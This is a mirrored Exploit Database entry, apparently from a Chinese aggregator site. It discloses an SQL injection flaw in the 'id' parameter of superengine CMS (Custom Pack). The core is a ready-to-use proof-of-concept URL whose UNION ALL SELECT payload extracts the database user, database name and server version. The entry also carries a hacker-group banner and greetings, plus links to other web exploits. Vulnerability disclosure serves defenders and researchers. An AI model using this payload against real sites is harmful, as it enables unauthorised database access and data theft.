superengine CMS (Custom Pack) – SQL Injection

Exploit Database
84 阅读

作者： 10n1z3d

日期： 2010-02-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11456/

________|__|| ____________ ____ ____
_/ __ \\/ /|| \___ /_ \ /\_/ __ \ 
\___/\ /|||__/(<_> ) |\___/ 
 \___>\_/ |__|____/_____ \____/|___|/\___>
 \/ \/\/ \/ .org


Author: 10n1z3d <10n1z3d[at]w[dot]cn>
Date: 15/02/2010
---------------------------------------------------------
superengine CMS (Custom Pack) SQL Injection Vulnerability
---------------------------------------------------------
Vendor: http://superengine.ro/
Vuln:
http://[server]/index.php?mod=0&id=1[SQLI]

PoC:
http://[server]/index.php?mod=0&id=-1337+UNION+ALL+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
---------------------------------------------------------
Greetz to all evilzone.org members.

last Exploits
superengine CMS (Custom Pack) – SQL Injection的更多信息

jbFileManager – Directory Traversal：
Joomla! Component JomEstate PRO 3.7 – ‘id’ SQL Injection：
Colorful Blog – Cross-Site Request Forgery (Change Admin Password)：
CSZ CMS 1.2.9 – ‘Multiple’ Arbitrary File Deletion：
Bioly 1.3 – ‘/index.php’ Cross-Site Scripting / SQL Injection：
Simple Machines Forum (SMF) 1.1.14/2.0 – ‘[img]’ BBCode Tag Cross-Site Request Forgery：
Joomla! Component Advertisement Board 3.0.4 – ‘id’ SQL Injection：
OrangeHRM 2.6.2 – ‘jobVacancy.php’ Cross-Site Scripting：